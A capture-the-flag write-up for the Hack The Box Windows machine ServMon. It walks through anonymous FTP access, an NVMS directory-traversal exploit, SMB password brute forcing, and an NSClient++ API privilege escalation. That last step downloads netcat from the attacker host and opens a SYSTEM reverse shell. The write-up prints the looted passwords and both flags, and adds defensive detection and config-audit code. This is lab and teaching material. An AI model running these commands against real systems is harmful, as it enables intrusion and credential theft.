Hack The Box Writeup: Servmon

ServMon is an easy Microsoft Windows box worth 20 points. Its slogan, “Monitoring is not protection”, really lives up to its name. Let’s do this!

[0x1] Reconnaissance & Enumeration

Step 1 is to run a port and service scan against the machine. Since it is a Microsoft Windows machine, quite a few RPC ports are visible, but also some other well-known ports.

nmap -sC -sV -p- -T5 -oA servmon-allports 10.10.10.184

# Nmap 7.80 scan initiated Sun Apr 12 19:07:33 2020 as: nmap -sC -sV -p- -T5 -oA servmon-allports 10.10.10.184
Nmap scan report for 10.10.10.184
Host is up (0.024s latency).
Not shown: 65516 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20 12:05PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
| 256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_ 256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp open http
| fingerprint-strings:
| GetRequest, HTTPOptions, RTSPRequest:
| HTTP/1.1 200 OK
| Content-type: text/html
| Content-Length: 340
| Connection: close
| AuthInfo:
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
| <html xmlns="http://www.w3.org/1999/xhtml">
| <head>
| <title></title>
| <script type="text/javascript">
| window.location.href = "Pages/login.htm";
| </script>
| </head>
| <body>
| </body>
| </html>
| NULL:
| HTTP/1.1 408 Request Timeout
| Content-type: text/html
| Content-Length: 0
| Connection: close
|_ AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
5666/tcp open tcpwrapped
6063/tcp open x11?
6699/tcp open napster?
7680/tcp open pando-pub?
8443/tcp open ssl/https-alt
| fingerprint-strings:
| FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
| HTTP/1.1 404
| Content-Length: 18
| Document not found
| GetRequest:
| HTTP/1.1 302
| Content-Length: 0
| Location: /index.html
| workers
|_ jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after: 2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC

Host script results:
|_clock-skew: 24s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-04-12T18:11:32
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 12 19:11:29 2020 -- 1 IP address (1 host up) scanned in 236.52 seconds

The port scan shows an open tcp/21 port which, according to the nmap scan, offers an FTP service with anonymous access. This is a good starting point for further investigation.

[0x2] Initial Access

Logging in as anonymous works and I have access through FTP.

ftp open 10.10.10.184

Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:user): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

The FTP service exposes the folders of two so-called employees.

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:05PM <DIR> Users
226 Transfer complete.

ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:06PM <DIR> Nadine
01-18-20 12:08PM <DIR> Nathan

Nadine’s folder contains a file called Confidential.txt which sounds like an interesting file to download. I use the get command to download the file to my local machine.

ftp> cd Nadine
250 CWD command successful.

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:08PM 174 Confidential.txt
226 Transfer complete.

get confidential.txt
local: confidential.txt remote: confidential.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
174 bytes received in 0.11 secs (1.5681 kB/s)

Nathan’s folder contains a to-do list. Files like this often hold hints that help in the further search for the flags. I download this file as well to view later.

ftp> cd Nathan
250 CWD command successful.

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20 12:10PM 186 Notes to do.txt
226 Transfer complete.

The Confidential.txt file indicates that a Passwords.txt file exists on Nathan’s Desktop and refers to a “secure folder”.

cat confidential.txt

Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

The Notes to do.txt file gives some interesting hints for the rest of the box. Apparently an application called NVMS is running that is still publicly accessible, and its password had to be changed.

cat Notes\ to\ do.txt

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

NVMS found at http://10.10.10.184

NVMS turns out to have a known directory traversal vulnerability, for which I download the Python exploit from Exploit-DB. It lets me fetch the Passwords.txt file from Nathan’s desktop and save it locally.

python exploit.py http://10.10.10.184/Pages users/Nathan/Desktop/Passwords.txt Passwords.txt

Directory Traversal Succeeded
Saving Output

Not 1 but 6 passwords. They may not all work, or each may serve a different purpose.

cat Passwords.txt

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me

I use the Metasploit scanner smb_login to check, using the password file, whether I can log in over SMB with the username “nathan”. The nmap scan showed that port 445 (SMB) is open.

msf5 > use auxiliary/scanner/smb/smb_login

msf5 auxiliary(scanner/smb/smb_login) > set pass_file Passwords.txt
pass_file => Passwords.txt

msf5 auxiliary(scanner/smb/smb_login) > set smbuser nathan
smbuser => nathan

msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.184
rhosts => 10.10.10.184

msf5 auxiliary(scanner/smb/smb_login) > run

No hit is found while brute forcing the SMB login for Nathan. None of the passwords work for this account.

[*] 10.10.10.184:445 - 10.10.10.184:445 - Starting SMB login bruteforce
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:1nsp3ctTh3Way2Mars!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:Th3r34r3To0M4nyTrait0r5!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:B3WithM30r4ga1n5tMe',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:L1k3B1gBut7s@W0rk',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:0nly7h3y0unGWi11F0l10w',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:IfH3s4b0Utg0t0H1sH0me',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nathan:Gr4etN3w5w17hMySk1Pa5$',
[*] 10.10.10.184:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Another SMB brute force, this time with Nadine’s account. This run does produce a hit: L1k3B1gBut7s@W0rk.

msf5 auxiliary(scanner/smb/smb_login) > set smbuser nadine
smbuser => nadine
msf5 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.10.184:445 - 10.10.10.184:445 - Starting SMB login bruteforce
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nadine:1nsp3ctTh3Way2Mars!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nadine:Th3r34r3To0M4nyTrait0r5!',
[-] 10.10.10.184:445 - 10.10.10.184:445 - Failed: '.\nadine:B3WithM30r4ga1n5tMe',
[+] 10.10.10.184:445 - 10.10.10.184:445 - Success: '.\nadine:L1k3B1gBut7s@W0rk'
[*] 10.10.10.184:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
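Seen from the target, the two smb_login runs above leave a very recognisable trail in the Windows Security log: a burst of event 4625 (failed logon, logon type 3 = network) from one source, followed by a single 4624 (successful logon) for the account whose password was in the list. The following is an added detection example, not part of the original writeup; the events are constructed to mirror that sequence, and the source and client IPs are sample values.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Windows Security events: 4625 = failed logon, 4624 = successful
# logon, type 3 = network logon (what SMB authentication produces). The first
# host runs the password list against nathan, then nadine, and hits on nadine;
# the second host is a normal user mistyping a password once, as a control.
EVENTS = [
    {"time": "2020-04-12T19:30:01", "id": 4625, "user": "nathan", "ip": "10.10.14.40", "type": 3},
    {"time": "2020-04-12T19:30:02", "id": 4625, "user": "nathan", "ip": "10.10.14.40", "type": 3},
    {"time": "2020-04-12T19:30:02", "id": 4625, "user": "nathan", "ip": "10.10.14.40", "type": 3},
    {"time": "2020-04-12T19:30:03", "id": 4625, "user": "nathan", "ip": "10.10.14.40", "type": 3},
    {"time": "2020-04-12T19:30:04", "id": 4625, "user": "nathan", "ip": "10.10.14.40", "type": 3},
    {"time": "2020-04-12T19:31:10", "id": 4625, "user": "nadine", "ip": "10.10.14.40", "type": 3},
    {"time": "2020-04-12T19:31:10", "id": 4625, "user": "nadine", "ip": "10.10.14.40", "type": 3},
    {"time": "2020-04-12T19:31:11", "id": 4625, "user": "nadine", "ip": "10.10.14.40", "type": 3},
    {"time": "2020-04-12T19:31:11", "id": 4624, "user": "nadine", "ip": "10.10.14.40", "type": 3},
    {"time": "2020-04-12T19:45:00", "id": 4625, "user": "nadine", "ip": "10.10.10.50", "type": 3},
    {"time": "2020-04-12T19:45:20", "id": 4624, "user": "nadine", "ip": "10.10.10.50", "type": 3},
]

def detect_smb_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Flag source IPs with >= threshold failed network logons inside `window`,
    and record whether a network logon from that IP succeeded afterwards."""
    by_ip = defaultdict(list)
    for e in events:
        if e["type"] == 3:                    # only network logons (SMB, not console)
            by_ip[e["ip"]].append(e)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["time"])     # ISO-8601 strings sort chronologically
        fails = [datetime.fromisoformat(e["time"]) for e in evs if e["id"] == 4625]
        # sliding window: do `threshold` consecutive failures fit inside `window`?
        burst = any(fails[i + threshold - 1] - fails[i] <= window
                    for i in range(len(fails) - threshold + 1))
        if not burst:
            continue
        users = sorted({e["user"] for e in evs if e["id"] == 4625})
        last_fail = max(fails)
        # first success at or after the last failure = the password-list hit
        hit = next((e for e in evs if e["id"] == 4624
                    and datetime.fromisoformat(e["time"]) >= last_fail), None)
        alerts[ip] = {"failures": len(fails), "users": users,
                      "success_after": hit["user"] if hit else None}
    return alerts

if __name__ == "__main__":
    for ip, alert in detect_smb_bruteforce(EVENTS).items():
        print(ip, alert)
```

The `success_after` field is the one worth paging on: many failures followed by a success from the same source is a credential that has just been found, not a user who forgot a password.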

[0x3] Path to User flag

I use the found credentials to try to log in via SSH, a service the nmap scan also showed. The login succeeds and I can look for new information.

ssh nadine@10.10.10.184
nadine@10.10.10.184's password:

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

Once connected to the server, I check whether there is a user flag in Nadine’s profile. The user.txt is on her desktop.

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020 22:28 <DIR> .
08/04/2020 22:28 <DIR> ..
18/04/2020 11:57 34 user.txt
               1 File(s) 34 bytes
               2 Dir(s) 27,417,485,312 bytes free

Nadine’s account has read access to the file, and with that the user flag is in!

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
ec99b381bef3129dfa5824cef82b1c6c

[0x4] Path to Root flag

While looking around in C:\Program Files\ I come across an NSClient++ folder. The previously found to-do list indicated that access to it had been locked down. While looking through nsclient.ini I find a password, and after some searching on Exploit-DB I find a known vulnerability in this version of the NSClient++ monitoring agent.

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
# If you want to fill this file with all available options run the following command:
# nscp settings --generate --add-defaults --load-all
# If you want to activate a module and bring in all its options use:
# nscp settings --activate-module <MODULE NAME> --add-defaults
# For details run: nscp settings --help

; in flight - TODO
[/settings/default]

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1

[......clip.....]

The nmap output already showed another web service running on port 8443.

I create a temporary folder on the machine that I can delete later, so I don’t get in the way of other players. From my own machine I serve netcat.exe and a batch script that sets up the reverse connection.

nadine@SERVMON C:\>mkdir sys

nadine@SERVMON C:\sys>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\sys>
PS C:\sys> Invoke-WebRequest -Uri "http://10.10.14.40:8080/nc.exe" -OutFile "C:\sys\nc.exe"
PS C:\sys> Invoke-WebRequest -Uri "http://10.10.14.40:8081/nc_script.bat" -OutFile "C:\sys\nc_script.bat"

The first step of the exploit is to upload my custom reverse-connection script. Through the API it is possible to upload your own .bat file to the central scripts folder on the server. The admin password I found in nsclient.ini comes in handy here.

nadine@SERVMON C:\sys>curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/nc_script.bat --data-binary @nc_script.bat
Enter host password for user 'admin':
Added nc_script as scripts\nc_script.bat

Before I run the script I start a Netcat Listener on my own machine on port 1337.

rlwrap netcat -lvnp 1337
listening on [any] 1337 ...

The second step of the exploit is to actually execute the script that I previously uploaded. Again, I use the same password.

nadine@SERVMON C:\sys>curl -s -k -u admin "https://localhost:8443/api/v1/queries/nc_script/commands/execute"
Enter host password for user 'admin':

The script is called and executed through the API. Immediately afterwards I see the reverse connection coming in on my listener. Because the NSClient++ service runs as SYSTEM, the shell runs as that user.

connect to [10.10.14.40] from (UNKNOWN) [10.10.10.184] 49882
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
nt authority\system

C:\Program Files\NSClient++>hostname
ServMon
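Three things had to line up for the chain above: a plaintext API password in a config file a low-privilege user could read, `allowed hosts = 127.0.0.1` (which still lets any local user reach the API, as the curl to localhost shows), and a web API that can add and run external scripts under the service account. The following is an added defender-side check, not part of the writeup: a small Python audit of nsclient.ini that flags those three conditions. Only the two keys under `[/settings/default]` are quoted from the box; the `[/modules]` section with `WEBServer` and `CheckExternalScripts` is assumed from NSClient++'s documented configuration layout, and the password value is a placeholder.

```python
import configparser

# Constructed nsclient.ini fragment (not the box's file): the two keys seen above
# plus an assumed [/modules] section; the password is a placeholder value.
SAMPLE_INI = """\
# nscp settings --generate --add-defaults --load-all
; in flight - TODO
[/settings/default]
; Undocumented key
password = SAMPLE-PASSWORD-PLACEHOLDER
; Undocumented key
allowed hosts = 127.0.0.1

[/modules]
CheckExternalScripts = enabled
WEBServer = enabled
"""

def load_nsclient_ini(text):
    # NSClient++ uses '#' and ';' comments and keys with spaces; both are fine
    # for configparser. Disable interpolation so '%' in passwords is not parsed.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str          # keep module names' case (WEBServer, ...)
    cp.read_string(text)          # for a real file: open(path, encoding="utf-8-sig")
    return cp

def audit_nsclient(cp):
    """Return a list of (code, detail) findings for the risk conditions above."""
    findings = []
    default = cp["/settings/default"] if cp.has_section("/settings/default") else {}
    if default.get("password"):
        findings.append(("PLAINTEXT_API_PASSWORD",
            "nsclient.ini holds the API password in clear text; anyone who can read "
            "the file can use the API. Restrict the file's ACL to the service account."))
    hosts = [h.strip() for h in default.get("allowed hosts", "").split(",") if h.strip()]
    if any(h in ("127.0.0.1", "::1", "localhost") for h in hosts):
        findings.append(("LOOPBACK_ALLOWED",
            "allowed hosts includes loopback: every local user who knows the password "
            "can reach the API, so the host filter alone does not protect it."))
    modules = cp["/modules"] if cp.has_section("/modules") else {}
    on = ("1", "enabled", "true")
    ext = modules.get("CheckExternalScripts", "").lower() in on
    web = modules.get("WEBServer", "").lower() in on
    if ext and web:
        findings.append(("SCRIPT_EXEC_VIA_API",
            "WEBServer and CheckExternalScripts are both enabled: the REST API can "
            "add and run external scripts under the service account (SYSTEM here)."))
    return findings

if __name__ == "__main__":
    for code, detail in audit_nsclient(load_nsclient_ini(SAMPLE_INI)):
        print(code, "-", detail)
```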

The Administrator’s Desktop directory holds root.txt, and with that the machine is as good as owned.

C:\Program Files\NSClient++>cd c:\users\administrator\desktop
cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C
 Directory of c:\Users\Administrator\Desktop
08/04/2020 23:12 <DIR> .
08/04/2020 23:12 <DIR> ..
19/04/2020 07:41 34 root.txt
               1 File(s) 34 bytes
               2 Dir(s) 27,422,359,552 bytes free

Last step: display the root flag and mark ServMon on Hack The Box as rooted. Gotcha!

c:\Users\Administrator\Desktop>type root.txt
type root.txt
1fb45c5963b0af52703933b40e68c728



d0p4m1n3

Ethical Hacker | Cybersecurity enthusiast | Always looking to expand my knowledge | got root?
